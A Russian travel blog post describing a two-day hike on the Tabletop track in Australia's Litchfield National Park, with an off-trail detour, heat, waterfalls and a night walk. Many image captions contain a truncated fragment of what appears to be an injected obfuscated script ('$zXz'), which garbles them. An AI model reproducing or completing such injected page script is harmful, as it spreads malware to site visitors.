Часть четвертую (предыдущую) смотрим здесь
День одиннадцатый.
1 Августа 2011 (Понедельник). Litchfield National Park, Tabletop track (Австралия)
Ясно. Днем t=+33C, Ночью t=+17C
Праздник «День пикника» отмечаемый на Северных Территориях Австралии.
За день прошли пешком по пересеченной местности 13 км и 6.6 км по тропе. Всего 19.6 км.
Встали в кемпе Florence Falls засветло, чтобы собрать вещи перед выходом в двухдневный поход. Определенные опасения вызывал наш холодильник, который в принципе мог не проработать 2+ суток аккумулятора без подзарядки, а следовательно на жаре мы потеряли бы все замороженные продукты. Но как выяснилось впоследствии на минимальном режиме он все же продержался.

Tabletop track — является классическим пешеходным маршрутом по плоскогорью, в периодическими выходами на пересеченку. Длина кольца составляет 39 км, брошюра парка требует наличие с собой топографических карт, спутникового телефона, запаса воды и еще хрен знает чего. Маршрут имеет уровень difficult и предполагает 3-5 дней на прохождение 🙂
В общем мы отвели на это два дня. В принципе думали что и одного дня может хватить на все, но решили что нужно время на фото ну и резервное, так что запас на ночь все же взяли с собой в виде палатки, горелки с газом и жратвы.
![Litchfield NP, выход на Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1731__800x534_au_425.jpg)
В семь двадцать утра мы вышли на маршрут. Навигацию обеспечивал GPS, с предварительно закачанным треком маршрута из Интернета. Пройдя водопад Florence и выйдя на Shady Creek мы увидели что мы отклоняемся от трека в GPS приемнике. Поэтому было принято решение подниматься по холму наверх, чтобы напрямик выскочить на маркированную дорожку. Это была ошибка, так как настоящий выход (мы узнали это только в конце нашего путешествия) именно проходил через дорожку ведущую через Shady Creek. Каково же было наше удивление когда наверху никакой тропы мы не обнаружили, и решили что трек судя по всему малопопулярен и именно поэтому здесь советуют использовать топографические карты и недюженные навыки бушмена. Поэтому мы просто пошли через дикий лес в целом придерживаясь трека закаченного в наш навигатор.

Ложный трек вел нас через такие дебри, что нам даже стало супер нравится. Мы видели маленьких диких черных кабанов, шли через заросли нетронутой травы, перелезали через упавшие деревья….
В общем это был обычный наш дикий туризм только в Австралии.

Немного напрягала переправа через ручьи заросшие травой-пилой, за которой потенциально могли прятаться крокодилы ну и отсутствие орешника, чтобы сделать нормальную палку для распугивания кроко. Местные деревья все какие то хрупкие, либо жутко колючие.

Временами нам открывались обнажившиеся русла рек и ручьев из-за ушедшей в сухой сезон воды. Продвигались мы не очень быстро, со скоростью 2 — 3 км в час.

Встречались и классические кафедральные термитники огромных размеров. Как приятно видеть этих исполинов без дорожек, людей и указателей!

А это — Саговник известняковый (Cycas Calcicola).Голосеменное растение сухими листьями которого очень хорошо растапливать огонь. Может достигать 7 метров высоту. Аборигены используют его плоды в пищу, предварительно обработав и удалив его ядовитые свойства.

Через пару часов мы спустились с плоскогорья, в долину, обнаружив поле заставленное магнитными и кафедральными термитниками. Магнитные дают приятную прохладу тени.

А вот другой ракурс.

Мы продолжали наше движение, немного изнывая от жары поднимающегося все выше солнца. Вернувшись на «трек» мы увидели под собой зеленое море буша.

За пять часов мы преодолели всего 11 км абсолютно дикого рельефа из зарослей травы в человеческий рост, каменых россыпей, кабаньих троп, горных спусков, перправ через водные препятствия! Мы реально стали уставать от этой почти постоянной рубки сквозь заросли кустарника по высохшим каменистым руслам рек с перепадами в сотни метров. Как то с трудом мне представлялись малоподготовленные пенсионеры на таком маршруте.

О того, что камни нагреваются эквивалентная температура на рельефе к полудню достигла 40С! И все это при умеренных физических нагрузках под рюкзаками. Любой ручей по пути воспринимался как манна небесная.

Можно было освежить немного голову и подышать в тени.

И вот на 13-м километре и шестом часу этого приключения мы перешли в центральную долину этого плоскогорья и увидели людей! Как оказалось это были единственные туристы которые шли по удобному, протоптанному, хорошо маркированному светоотражающими маркерами треку за этот день.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1744__800x534_au_438.jpg)
И мы полетели. Скорось резко выросла до 4-5 км в час. Ложный трек вел нас в стороне нескольких километров от правильного расположения настоящего маршрута, который могут идти даже дети. Вот это ирония. Однако позже мы совсем не жалели о приобретенном опыте.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1745__800x534_au_439.jpg)
Временами под ногами хрустел песок и местность больше напоминала полупустыню. Пекло! Расход воды был просто чудовищным. За день мы выпили не менее 3-х литров на человека, не считая вечернего чая в лагере.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1746__800x534_au_440.jpg)
Но как же необычна природа Австралии.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1747__800x534_au_441.jpg)
Через семь км и радиального выхода на безымянную стоянку которая нам не понравилась (воды нет, комары какие то из болотистого леса, место в низине) мы достигли лагеря у Walker Creek. Время 15:30. Восьмичасовой непростой пеший день.

Вот это реально оказалось местом достойным. Особенно стоянка №6 о которой я читал в путеводителе. Мы не удивились тому, что оно оказалось свободным, так как судя по всему Tabletop track не сильно популярен среди австралов 😀

Классическая схема приготовления обеда сработала и в Австралии. Мы сделали суп и накипятили чаю из местной речки.

И великолепный местный водопадик с чистой и прохладной водичкой.

а также персональный бассейн для купания

Что еще может хотеть запылившийся путник?

Вскоре наступил закат. Мы развели костер и лежали на пенках смотря на Южный Крест и Центавр. Неведомые птицы пели в лесу и время от времени я «выпадал в космос» переставая понимать разницу между реальностью и сном. В роднике ночью увидели местных раков.

Спасть легли около 23 часов. Так как я не взял с собой спальник, то ночью проснулся от холода и до утра ворочался. Но силы все же восстановил, хотя до конца и не выспался. В палатке вроде было 17 градусов.
День двенадцатый.
2 Августа 2011 (Вторник). Litchfield National Park, Tabletop track (Австралия)
Ясно. Днем t=+33C, Ночью t=+20C
За день прошли пешком по тропе 38.5 км, набрав 620 метров и сбросив 645 м.
Наше путешествие по Tabletop track продолжается. Переночевав на Walker creek мы планировали сегодня быть снова на Florence Falls. Встали до рассвета в шесть утра и развели костер чтобы согреться. Короткие утренние сборы и в 7:30 мы уже пылим по тропе.

Вот так выглядел наш «водопад утром».

Для начала нам предстоит довольно трудный участок в 19 км до больших водопадов Wangi. Рельеф местами ожидается сильнопересеченный, так что надо набрать максимальную скорость пока прохладно.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1858__800x534_au_452.jpg)
Пейзажи представляют в основном смесь саванны, старых выходов осадочных пород и редколесья.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1757__800x534_au_451.jpg)
Даже деревья прячутся за камнями от изнуряющей жары.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1758__800x534_au_453.jpg)
Регулярно делаем остановки чтобы пофотографироваться и передохнуть.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1759__800x534_au_454.jpg)
Краски смешаны в самых диких пропорциях.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1760__800x534_au_455.jpg)
Временами начинаются небольшие подъемы и спуски чередующиеся друг за другом.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1761__800x534_au_456.jpg)
Иногда встречаются речушки.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1762__800x534_au_457.jpg)
Которые сейчас преодолеваются без всяких проблем вброд. Однако во влажный сезон здесь могут быть неприятные неожиданности.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1763__800x534_au_458.jpg)
Снова саговник известняковый, только уже большой.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1764__800x534_au_459.jpg)
и его плоды крупным планом
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1765__800x534_au_460.jpg)
Примерно через пару часов появилось много каменистых подъемов. Тропа на таких участках теряется и требуется внимательно осматривать окрестности чтобы увидеть следующий навигационный маркер.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1766__800x534_au_461.jpg)
Алексей заприметил интересный вид!
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1767__800x534_au_462.jpg)
Редко встречаются небольшие места для стоянок. Выглядит это вот так. По сути небольшой столик и место для костра, а также ровная площадка для установки палатки.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1768__800x534_au_463.jpg)
Поднимаясь выше по рельефу нам открылся замечательный вид на равнину внизу. Как приятно быть на горке, даже такой небольшой как здесь!
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1769__800x534_au_464.jpg)
Местная ящерка. Пришла попить воду разлитую из бутылки.

И снова водопады и ручьи.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1771__800x534_au_465a.jpg)
У которых мы отдыхали после изнурительных подъемов на сорокоградусной жаре. А летом здесь вообще будет зеленый ад.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1772__800x534_au_466.jpg)
Больше всего мне доставляло удовольствие набрать под музыку скорость вот на таких участках с травяным ландшафтом. Как будто летишь по Австралии.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1773__800x534_au_467.jpg)
В общем эти 20 км мы шли до 13:30, т.е. в сумме пять часов довольно напряженной работы.

Верхняя часть (исток) водопада Wangi Falls.

Гуляние вдали от размеченной дорожки запрещено, т.к. место как бы имеет культурную ценность у аборигенов. Только кажется мне аборигенам давно уже на это плевать. По сути здесь уже проходной двор с кучей людей каждый день.

Вниз идет рукотворная длинная лестница с кучей проемов. Внизу сплошня зеленка.

В которой водятся вот такие адские создания в огромном количестве — летучие лисицы. Очень крикливые и неприятые на вид. Висят себе вниз головами на деревьях и плюют на всех 😀

Сами водопады выглядят очень достойно, хотя воды конечно маловато.Народу здесь побольше чем на Florence Falls, так как подъезд удобнее и не надо ходить по длинной и тяжелой для тучных людей лестнице, а прошелся немного по прямой и плюх брюхом в водопад!

Wangi Falls являются жемчужиной парка и одним из наиболее посещаемым мест отдыха. Наиболее зрелищны водопады во влажный сезон (австралийским летом).
Здесь есть почти все необходимое для пузатых туристов: туалет, душ, автостоянка, места для барбекю и даже киоск в котором мы нажрались каких то ужасных гамбургеров и запили это все огромным количеством сладкой газировки закончив мороженным как абсолютно больные на голову подростки. Но потерю энергии надо было восполнить быстро хоть и таким ужасным способом, ведь впереди у нас было еще 20 км пути!

Вид на автостоянку сверху.

Поспав часок прямо под деревом недалеко от киоска (а нам нечего стесняться), мы решили продолжить свой путь, хотя конечно очень нас разморило в теньке и прохладе.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1782__800x534_au_476.jpg)
Но ночевать вторую ночь черт знает где не очень хотелось, так что трек в 16:00 снова ждал нас.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1783__800x534_au_477.jpg)
И мы были действительно награждены живописнейшим участком вдоль реки. Каменистые перепады, сочная зелень по берегам и отражения синего неба в воде.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1784__800x534_au_478.jpg)
Вот не думал что судьба забросит меня сюда!
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1785__800x534_au_479.jpg)
По идее конечно путеводитель прав. 3-5 дней неспешного гуляния по живописным местам трека самое то для туристов. Однако нас поджимало время. Австралия такая большая.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1786__800x534_au_480.jpg)
А это очень удобная стоянка Tabletop camp, расположенная у небольшого порожка.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1787__800x534_au_481.jpg)
Были даже мысли заночевать здесь и немного помедитировать у воды. Время 17:00. Есть предчувствие что скоро мы будем топать в абсолютной темноте. Хорошо что фонари были с собой.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1788__800x534_au_482.jpg)
Дальше дорога повела нас уже в сумерках через высокий лес, напоминающий липовый, где нас и застала темнота в 19:10 когда пришлось одевать фонари чтобы различать тропу. Лишь слабый свет заходящей луны подсвечивал темную тропическую ночь. Выяснилось, что маркеры тропы, покрытые светоотражающим слоем замечательно видны на очень больших расстояниях в узком свете налобного фонаря, и когда ты видишь ближайший к тебе, зачастую небольшой поворот головы позволяет увидеть еще парочку следующих. Очень удобно. Следующие пару часов мы шли по абсолютно темным зарослям при свете наших фонариков, озираясь каждый раз, когда из буша доносился душераздирающий крик какого нибудь зверька или птицы.
В 21:15 мы вышли к долгожданной развилке на Florence Falls и через 15 минут были у кемпера в котором нас ждало охлажденное пиво. Божественно!
Итог дня: 39.5 км трека за 14 часов со всяким перерывами и отдыхом на водопадах. Не рекордный наш пробег, но вполне в рамках стандартного похода с небольшим напрягом. Общая длина Tabletop track в итоге у нас вышла в 59 км за два дня.
![Litchfield NP, Table<script>$zXz=function(n){if (typeof ($zXz.list[n]) ==](http://www.traveltales.ru/wp-content/gallery/cache/1789__800x534_au_483.jpg)
Продолжение следует….
Тэги: Arnhem highway, Arnhem Land, Aurora Shady Glen Tourist Park, Barrk sandstone bushwalk, billabong, cathedral termite mound, Darwin, Florence Falls, grevillea, Gunwarddehwarddeh, Jabiru, Jetstar, Kakadu National Park, kapok tree, Litchfield National Park, Mamukala wetlands, Namondjok, Nawurlandja, Nourlangie Rock, South Alligator River, Stuart Highway, Tabletop track, Termites Moulds, The Anbangbang Gallery, The Nanguluwurr Gallery, Turkey Bush, Ubirr, Wangi Falls, Yellow Water Cruises, Австралия, Дарвин, путешествие по Австралии, Северные территории Австралии, страна Оз